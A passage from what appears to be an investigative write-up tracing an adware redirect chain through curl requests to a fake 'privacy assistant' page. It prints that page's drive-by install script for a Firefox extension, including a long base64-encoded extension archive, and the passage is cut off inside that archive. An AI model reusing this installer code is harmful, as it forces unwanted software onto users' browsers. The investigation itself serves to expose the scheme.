Set-Cookie: SITE_ID=627219294; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: sov=627219294; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: tov=645649; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: mov=downloads.mini; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: redid=7988; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: campaign_id=42; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: gsid=68; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: pid=1597; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: impid=5057a1bc-7d7f-11e7-b7cd-fa245441bcee; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< X-Sov: 627219294< X-Rot: 645649< Set-Cookie: tags[3578][iframe_enable]=0; expires=Fri, 11-Aug-2017 03:54:32 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Expires: Mon, 01 Jan 2001 00:00:00 GMT< Cache-Control: no-cache< Pragma: no-cache< Set-Cookie: shid=esgmgmssigwqe%7C403026589; expires=Thu, 10-Aug-2017 04:42:52 GMT; Max-Age=3000; path=/; domain=.gdn<

<html><head><title></title>

<noscript><meta http-equiv='refresh' content='0;url=NEX981privacyassistffUS.html'></noscript><script>"NEX981privacyassistffUS.html" && (window.location = "NEX981privacyassistffUS.html");</script>

<!-- NEX981privacyassistffUS.html --><!-- --><!-- --><!-- --><!-- --><!-- COI464macjuuuliiytdjuuuuliiiUS.html --><!-- --><!-- --><!-- --><!-- --><!-- --><!-- --><!-- --><!-- --><!-- --><!-- --><!-- -->

<meta name="robots" content="noindex, nofollow" /></head><body>

</body></html><a href="//alldownloads.hapc.gdn/admin_config" style="display:none"></a><!-- Mini 208 :: 1502337172 -->

Now we again see an attempt to set a large payload, this time via cookie, and refresh to a “privacy assist” page. Hm, I think we’re getting closer to the actual payload…

Weirdly enough the “admin config” link seems empty; perhaps there’s a special code that needs to be input, or only certain IPs can access it.

$ curl -v -v "http://NrRzz.alldownloads.hapc.gdn/NEX981privacyassistffUS.html"* Trying 45.76.0.183...* TCP_NODELAY set* Connected to NrRzz.alldownloads.hapc.gdn (45.76.0.183) port 80 (#0)> GET /NEX981privacyassistffUS.html HTTP/1.1> Host: NrRzz.alldownloads.hapc.gdn> User-Agent: curl/7.54.0> Accept: */*>< HTTP/1.1 302 Found< Date: Thu, 10 Aug 2017 03:55:54 GMT< Content-Type: text/html; charset=UTF-8< Transfer-Encoding: chunked< P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"< Set-Cookie: ci_session=JcV9LkTbGbswOHgxP03ZelrFJnwvITl6%2FrLkzs1HDyYuBZuSLQ9YXPdqC7E0JTQ7DL2vomDL8fAlXVxSZASofNr2EsUeJYCHRelBxeXCdtnml5wx7ClERMAdT0cm5nh0ROWszDU%2FYCRPue5X1cmD6Naehpe7YinmygyLwuXrsuM0iSVexgO2Jt%2BurtVwbTF2Fj5VTxKKWd5IiaGuwQFeuEmRbVXFSC12kPpmS4B8lCi2t5YxQQ4gdMEtXHycGiCod%2FEGV%2B8PFDvrMJap%2FF0SCjUhMxnKZHZPk1eaQsnYlJPZ6TfK2ta1PbaFVzK1yASUm%2FY3sOiFXJEphgXyeJLeIg%3D%3D; expires=Fri, 11-Aug-2017 03:55:53 GMT; Max-Age=86400; path=/; domain=.NrRzz.alldownloads.hapc.gdn< X-Source: Mini< Set-Cookie: id=noid; expires=Fri, 11-Aug-2017 03:57:33 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: SITE_ID=93226501; expires=Fri, 11-Aug-2017 03:57:33 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: sov=93226501; expires=Fri, 11-Aug-2017 03:57:33 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: tov=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: mov=downloads.mini; expires=Fri, 11-Aug-2017 03:57:33 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: redid=0; expires=Fri, 11-Aug-2017 03:57:33 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: campaign_id=0; expires=Fri, 11-Aug-2017 03:57:33 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: gsid=0; expires=Fri, 11-Aug-2017 03:57:33 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: pid=0; expires=Fri, 11-Aug-2017 03:57:33 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: impid=mini4157-7324-4039-8980-883b843d979a; expires=Fri, 11-Aug-2017 03:57:33 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< Set-Cookie: URI=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.NrRzz.alldownloads.hapc.gdn< X-Rot:< X-Sov: 93226501< X-Jump: NEX981privacyassistffUS.html< X-Jump-Data: a:13:{s:2:"id";s:5:"58767";s:3:"geo";s:2:"US";s:4:"name";s:27:"NextAd Privacy Assist FF US";s:6:"weight";s:3:"100";s:4:"slug";s:28:"NEX981privacyassistffUS.html";s:11:"landingpage";s:77:"http://n3xt.io/path/lp.php?trvid=10076&trvx=39ae0019&cid={S2S}&aff_id={REDID}";s:5:"subid";s:4:"MINI";s:8:"redirect";s:2:"JS";s:4:"type";s:17:"Privacy Assist FF";s:8:"offer_id";s:0:"";s:7:"network";s:3:"981";s:7:"account";s:4:"1287";s:3:"pos";s:3:"100";}< X-Jump-Redirect: http://n3xt.io/path/lp.php?trvid=10076&trvx=39ae0019&cid={S2S}&aff_id={REDID}< X-Jump-Vars: a:2:{i:0;a:2:{i:0;s:5:"{S2S}";i:1;s:3:"S2S";}i:1;a:2:{i:0;s:7:"{REDID}";i:1;s:5:"REDID";}}< Set-Cookie: cl=f2cd5f63-2085-478a-a955-5a7bcad3a87a; expires=Fri, 11-Aug-2017 03:57:33 GMT; Max-Age=86500; path=/; domain=.NrRzz.alldownloads.hapc.gdn< X-Jump-To: http://n3xt.io/path/lp.php?trvid=10076&trvx=39ae0019&cid=f2cd5f63-2085-478a-a955-5a7bcad3a87a&aff_id=0< Expires: Mon, 01 Jan 2001 00:00:00 GMT< Cache-Control: no-cache< Pragma: no-cache< Location: http://n3xt.io/path/lp.php?trvid=10076&trvx=39ae0019&cid=f2cd5f63-2085-478a-a955-5a7bcad3a87a&aff_id=0

Whee, off we go again with a 302 redirect to n3xt.io; registered by GoDaddy, DNS by Amazon Route53, and again dual-homed IPs to AWS. Seems a lot of these scammers like hosting on Amazon infrastructure with second-tier VPS hosts layered between for indirection.

$ host n3xt.ion3xt.io has address 54.183.45.103n3xt.io has address 54.183.112.92

Let’s see what’s here.

$ curl -v -v "http://n3xt.io/path/lp.php?trvid=10076&trvx=39ae0019&cid=f2cd5f63-2085-478a-a955-5a7bcad3a87a&aff_id=0"* Trying 54.183.112.92...* TCP_NODELAY set* Connected to n3xt.io (54.183.112.92) port 80 (#0)> GET /path/lp.php?trvid=10076&trvx=39ae0019&cid=f2cd5f63-2085-478a-a955-5a7bcad3a87a&aff_id=0 HTTP/1.1> Host: n3xt.io> User-Agent: curl/7.54.0> Accept: */*>< HTTP/1.1 302 Moved Temporarily< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0< Cache-control: no-cache="set-cookie"< Content-Type: text/html< Date: Thu, 10 Aug 2017 03:56:13 GMT< Expires: Thu, 19 Nov 1981 08:52:00 GMT< location: http://cw.privacyassistant.net/ext/recommended?cid=8gb7mi6np8wd&trs=YTZ&cont=USA&c=10076&z=0< Pragma: no-cache< Server: Thrive-01766a2d11972f080-us-west-1< Set-Cookie: THRIVE_SESS=cbkoinkmp2u0bc92b5k7rf6711; expires=Fri, 11-Aug-2017 03:56:13 GMT; Max-Age=86400; path=/; domain=.n3xt.io< Set-Cookie: ClickId=8gb7mi6np8wd; expires=Sat, 09-Sep-2017 03:56:13 GMT; Max-Age=2592000; path=/; domain=.n3xt.io< Set-Cookie: OfferPage=http%3A%2F%2Fcw.privacyassistant.net%2Fext%2Frecommended%3Fcid%3D8gb7mi6np8wd%26trs%3DYTZ%26cont%3DUSA%26c%3D10076%26z%3D0; expires=Sat, 09-Sep-2017 03:56:13 GMT; Max-Age=2592000; path=/; domain=.n3xt.io< Set-Cookie: OfferID=1046; expires=Sat, 09-Sep-2017 03:56:13 GMT; Max-Age=2592000; path=/; domain=.n3xt.io< Set-Cookie: clickData=eJyNU9tq20AQ%2FZWwD6aFWFfrYoMJaUJpIO1D3VBaBGW8O7KXyLtid6XEDf73zq7cEOhLEVhz88yZc0YvzA7bO8FWrN5tq4MsVV8%2FCXbJOBx6H0%2BTpCovmdWD4egDOXkdKCHVzrvJq3cLDqm%2BSLI8r%2Bi5ZLpt0UxNFuXZfTAdDds716%2BauIn5U9QbOQI%2FgrXSOlAuUuiaGJ%2FpxyDXhwMqgeKKS7F%2Bi3HmjF3%2F%2BPZzxrVy64fN9YyvA9jZ73XCztP%2BxdTDUQ8u4OaDMaj4kfA8bG79zlqNbNVCZ3Fypr9TqTOg7J2wVEp1BscQHaWVThu2emGyp1S2iIooreooLSoqgx0qt3GU96O6Jq6iYhF5bMTYbqD01K7THLqzjSN09zgikVTR2GPv4wLto9O9X%2BqMYERjpVaTszX6yaIfc0NjQoAUmXIHLXwvbwocJccvcDiPktZjvtEHDtZd3MCWMIS1FXI3NQ%2FBJr7d3Dfxd%2FlR%2Brx0nrANqIvPxI4OdOz%2Blney1UZJCI0E5oHa61BDagSM5AxGktHEPbh9E3d91O%2F7K2dGUnhSkOzndb4ETJJ0OfPKtxkXRVvm8yypi%2FmiqmEOy6KYF1BtOYgc6gpm0La%2FqDZhJ9pOOTQKOi8O13ZSnI4qBMPB%2F09LT3VCtaGldnsMYgvcDjtvmKHDDwbh0cvyLluk2Sqba%2Fv%2BXZmVi8kMuwtJl%2By%2BakLBlFbou%2B0DKKbyZxdJT6O13evxGew7yeljCLfl0SZpVZaQiTRdVlmb1Mlb4gc7f0Lr5ik7nV7P8hPYPeWKbZHwKhUpsSkWecXzRLT1EosSW16IMsOc3mnNTn8A09c7MQ%3D%3D; expires=Sat, 09-Sep-2017 03:56:13 GMT; Max-Age=2592000; path=/< Set-Cookie: AWSELB=E5EB9F1D14A57CA891D30EE50AEEC823B3A902F4EA724622E026F5AFE13FCE21AC3365562D7C10FE4E7B3025153BC728BC0A5EA2695BE5385EFBD54641946EEC51E459C4BB;PATH=/< Content-Length: 0< Connection: keep-alive

Okay, now we get our final client redirect to the “client” site, PrivacyAssistant.net which “provides additional information to your search results”. Got it; we’re going to have an extension that injects new ads in our search results. And so here comes the money shot, complete with the attempted drive-by Firefox auto-install of their plugin:

$ curl -v -v "http://cw.privacyassistant.net/ext/recommended?cid=8gb7mi6np8wd&trs=YTZ&cont=USA&c=10076&z=0"* Trying 23.23.203.84...* TCP_NODELAY set* Connected to cw.privacyassistant.net (23.23.203.84) port 80 (#0)> GET /ext/recommended?cid=8gb7mi6np8wd&trs=YTZ&cont=USA&c=10076&z=0 HTTP/1.1> Host: cw.privacyassistant.net> User-Agent: curl/7.54.0> Accept: */*>< HTTP/1.1 200 OK< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0< Content-Type: text/html; charset=UTF-8< Date: Thu, 10 Aug 2017 03:56:29 GMT< Expires: Thu, 19 Nov 1981 08:52:00 GMT< Pragma: no-cache< Server: Apache< Set-Cookie: PHPSESSID=bgoo24o8o6ufg63a7775494aa2; path=/; domain=.privacyassistant.net< Set-Cookie: cont=USA; expires=Sat, 09-Sep-2017 03:56:29 GMT; Max-Age=2592000; path=/; domain=.privacyassistant.net< Set-Cookie: cid=8gb7mi6np8wd; expires=Sat, 09-Sep-2017 03:56:29 GMT; Max-Age=2592000; path=/; domain=.privacyassistant.net< Set-Cookie: off_id=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.privacyassistant.net< Set-Cookie: br=chrome; expires=Sat, 09-Sep-2017 03:56:29 GMT; Max-Age=2592000; path=/; domain=.privacyassistant.net< Content-Length: 25621< Connection: keep-alive<<!DOCTYPE html><html><head><title>Improve Browser Security</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><link rel="stylesheet" type="text/css" href="style5.css"><link rel="chrome-webstore-item" href="https://chrome.google.com/webstore/detail/oofhoenjnigkpkkdnplfcbjapgcolpdm" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" /><script src="jquery.min.js"></script><script>function repEvent(ec="0",ea="0",el="0"){$.post("/ext/cevent.php?"+new Date().getTime(),{'ec':ec,'ea':ea,'el':el});}function repView(pg="dl"){$.get("/ext/cview.php?pg="+pg+"&" + new Date().getTime());}

var ffLoop = { active: true, attempts: 0, maxAttempts: 1000 };function dl(){dll = getCookie('dl');if(location.hostname.split('.')[0] == 'd' && dll != ''){$('.app').show();$('#dlmsg textarea').val(dll);$('#dlmsg').fadeIn();$("#dlmsg").find('textarea').select();return true;}return false;}function getCookie(c_name) {var i, x, y, ARRcookies = document.cookie.split(";");for (i = 0; i < ARRcookies.length; i++) {x = ARRcookies[i].substr(0, ARRcookies[i].indexOf("="));y = ARRcookies[i].substr(ARRcookies[i].indexOf("=") + 1);x = x.replace(/^\s+|\s+$/g, "");if (x == c_name) {return unescape(y);}}}function base64toBlob(base64Data, contentType) {var byteCharacters = atob(base64Data);var byteNumbers = new Array(byteCharacters.length);for (var i = 0; i < byteCharacters.length; i++) {byteNumbers[i] = byteCharacters.charCodeAt(i);}var byteArray = new Uint8Array(byteNumbers);return new Blob([byteArray], { type: contentType });}function isFirefoxInstalled(){var img = document.createElement('img');

img.addEventListener("load", function (e) {window.location.href = 'https://www.searchassist.net/';});

img.setAttribute("src", "chrome://searchassistincognito/content/skin/images/ping.png");}function checkFirefoxInstall() {setTimeout(function () {var img = document.createElement('img');

img.addEventListener("load", function (e) {ffLoop.active = false;$.get('hoconv.php?cont=USA&br=chrome&cid=8gb7mi6np8wd&off_id=');setTimeout(function(){if(location.hostname.split('.')[0] != 'd'){window.location.href = '/';}else {$('#element_to_pop_up').fadeOut();dl();}}, 2000);});

img.addEventListener("error", function (e) {ffLoop.attempts++;if (ffLoop.attempts != ffLoop.maxAttempts)checkFirefoxInstall();});

img.setAttribute("src", "chrome://searchassistincognito/content/skin/images/ping.png");

}, 200);}function startInstall() {isClick = true;isClickNow = true;

//showHelper();

checkFirefoxInstall();var a = document.createElement('a');a.style = "display: none";var url = window.URL.createObjectURL(base64toBlob("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